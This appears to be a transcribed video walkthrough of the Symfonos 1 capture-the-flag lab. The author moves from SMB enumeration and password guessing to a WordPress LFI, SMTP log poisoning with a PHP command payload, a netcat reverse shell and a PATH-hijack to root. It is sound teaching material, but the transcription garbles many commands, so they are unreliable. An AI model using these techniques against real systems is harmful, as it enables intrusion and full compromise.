Hello everyone, my name is Dashish Devar and today we're going to be looking at a vulnerable machine known as Symfonos 1. So this is part 1 of the Symfonos series and this machine is from VMware, made by Xiaotic. It is designed for VMware platform. It is a boot to root challenge where you have to find flags to finish the tasks assigned by the author. So we're going to be looking at various penetrating methodologies such as discover, nmap, SMB share folders, WP scan, local file inclusions, and LFI to remote code execution by SMTP lock versioning. From there on, to escalate our privileges, we will use path variables, hence capturing the flag completes the video. So let us begin. I'm going to log in inside my Kali machine. First things first, I'm going to check my IP. Okay, so let us sudo first. There it is. So my local IP is 192.168.20.128. As you can see, this is a static local IP assigned by the DH client, as I'm in the host only adapter. So there will be no internet connections as such. I'm also running my Symfonious machine in host only. So from here I will do an net discover to scan my IP range of IP followed by R. As you can see, if this is my gateway IP and this is my VMware IP, and my IP is 128, so this could be the Symfonious machine's IP. To confirm this, we're going to enumerate it on more using network mapping nmap, followed by thread 4, followed by tag sc for script, tag sv for version detection, followed by the IP, and /v/ for ports numbers. So this is going to take a while. I'm just going to pause the video. As you can see, the scanning is complete. So we can look at various ports, open ports, which is 22 TCP open for SSH, 25 TCP open for simple mail transfer protocol, 80 which is running on web server, HTTP, and it is running Apache Debian, 139 RPC which is running Samba SMBD, and 445 also for NetBIOS SSN Samba SMBD. So, and also with the domain name, we have symfonos.local domain. So let us nano our etc host file, page down, 20.131 tab symfonos.local. So we are going to enumerate the web server, open Firefox, and just write symfonos.local. So this is the web server, website, nothing in the source code. So while enumerating, we have seen that this is running an Apache web server and also is Samba. So you'll have to keep in mind whenever a web server is running Apache and Samba altogether, this could be Linux web server. So there is a pre-configured utility tool in Kali Linux to enumerate on Linux website, so which is enum for Linux. So we'll just go ahead and do it. Enum enumerate for Linux followed by the IP. Let it happen. I'm going to open another tab and we'll run SMB map here /d workgroup/h followed by the IP. So while running enum for Linux, we have found various share names and group such as print, Helios, Anonymous, and IPC to see at their access and permissions. We have done SMB map where you can see print has no access, Helios has no access, Anonymous is read-only, and IPC has no access. So if Anonymous is read-only, we can SMB client into the Anonymous folder and it won't require any password as such because it is read-only. Anonymous password blank. Okay, we'll try again. And now okay, we're inside the SMB directory of Anonymous. We can see there is a text file. We'll download it using git method. So exit cat the file. Can users please stop using passwords like apdioco, QWERTY, and baseball? Next person I find using one of these passwords will be fired by Zeus. So apdioco, QWERTY, and baseball, these are inside single code. This could be a password to SMB folder, share folder of Helios, I guess. So we're gonna use SMB client and followed by the user, and whenever there is a password protected folder, we have to specify the username again, followed by the tag switch of tag u, HELIOS, Helios. We're going to put password epidioco. So epidioco is not the password. We're going to try QWERTY again. QWERTY. Okay, so QWERTY is the password of Helios share folder of SMB. So list the files. There are two text files called research and todo. We'll get that too and get todo. Okay, now exit and cat respectively. Todo. So Helios is also one mythology and so nothing interesting yet. Only 3 words are there. Also Helios, Ethiopia, and Hesperides, which are under bracket. So this could be a password to another directory. Let's say IPC or IPC or print maybe. And cat todo is pinch on Dexter dance and work on H3L105. Okay, so this is a web directory. I think we can enumerate it further. Just writing here H3L105. Okay, so let's see if it is in web directory. Okay, so this is a web directory I found, and also an Helios site, just another WordPress site. This might be the picture of Helios, just son of God, and blah blah blah, WordPress and categories and log entries, WordPress. So okay, so whenever you are pen testing on a WordPress site and on a website and you find that this is WordPress, the first thing you're going to do is look for a WP scan, which is an utility for WordPress scan tool. It is being installed in Kali machines. HTTP followed by symfonos.local.u. Yeah, tag for inviting users. So lately my WP scan has not been working, and this is some issues in the utility. So I'm just gonna have to do it manually. So I'm gonna try to manually explore the website /WP content, because WP content added as this is an WordPress site. So as you can see, unable to resolve hostname. So and I did pen test on this machine before, so I know the vulnerable part. So after you run WP scan, they're going to show the various plugins on the site used, and there are going to be 2 plugins, and which one of them will be Mailmaster, which is the vulnerable. So using the Mailmaster vulnerable plugin, we can read the log entries of the mails. Okay, plugins mail / master inc count / count of send. Right there, inc campaign. So you can see I'm communicating with the web server, where basically the web server is thinking that Helios is accessing our files, but I'm not Helios. So this vulnerability can be used to insert an PHP code using SMTP mail server. So let us set my path here using pl equals, and I'm going to access the pass.wt folder. So you can see I can read all the mail logs. From here I can just press Ctrl U, and you can see it is Helios. So the server basically thinks that Helios is talking with the web server, but it's not. So this vulnerability can be used to insert a malicious PHP code inside the web server. So I'm just going to use telnet for it. Telnet followed by the IP and port number 25, which uses SMTP ports. So as I'm in the SMTP mail server, I can send and mail from here, which will contain a malicious code. Mail from, let's just say Devashish, mail from receipt to Helios data, and we'll insert our PHP code here. PHP followed by system bracket open $_ get, and we'll call CMD here. Right. Okay. So to send the email, we just have to put in a dot and enter. So you can see the email has been sent. So to check if the email has been sent, we can just access the var mail, var mail.helios. Okay. So as we're in the Helios, var mail /helios, you can see right here I have sent with ID symfonos.local domain from Devashish. Right, this ID matches SMTP CVS queue right there. So the mail has been sent, and I'm just going to quit the SMTP server right here. So now, after the code is successfully sent, and I'm going to start a listener here. For that, I'm going to call and function. Call and function equals C and ID. Okay. As we can see, the mail has been delivered to Helios. From now and there, I can call the netcat command, netcat /c, be inside the bin shell followed by the attacking IP machine, which is my IP 20.128, and you can specify any port number such as 5656. And before sending it, I'm going to start an listener followed by nc/lpp 5656 listener. So it's going to be listening on any port 5656, sorry, on port number 5656. I'm going to hit enter, and as soon as I hit enter, you can see, and I've got a reverse shell correction from the web server. I can write who am I, see there it is Helios. I'm going to list my files ls right there, but I am still not root. So to exclude out privileges, I'm going to set a term, and before setting a term, I'm going to spawn an TTY spawn shell, Python TTY spawn shell. So to get more info on Python TTY spawn shell, you can just Google Python TTY spawn shell, and you'll find all the info that how this shell works. So Python -c import pty dot spawn. I'm going to call bin sh shell and hit enter. Now I'm going to find a permittable, find perm u equals s, where type should be file, where 2 is greater than def/null. Okay, so I'm gonna cd to temp directory and echo using curl echo path export path equals to the temporary directory colon path and opt followed by opt status check. Right, you can see I'm root. Where am I root? ls-root.txt. I'm just going to cat right there. So you have successfully pawned the machine and got the root access of it. So here it is, guys. I'm going to be seeing you in the next video, which will be Symfonos 2 part 2 of the Symfonos series. Thank you for watching. Do like and subscribe my channel, and I'll see you in the next video.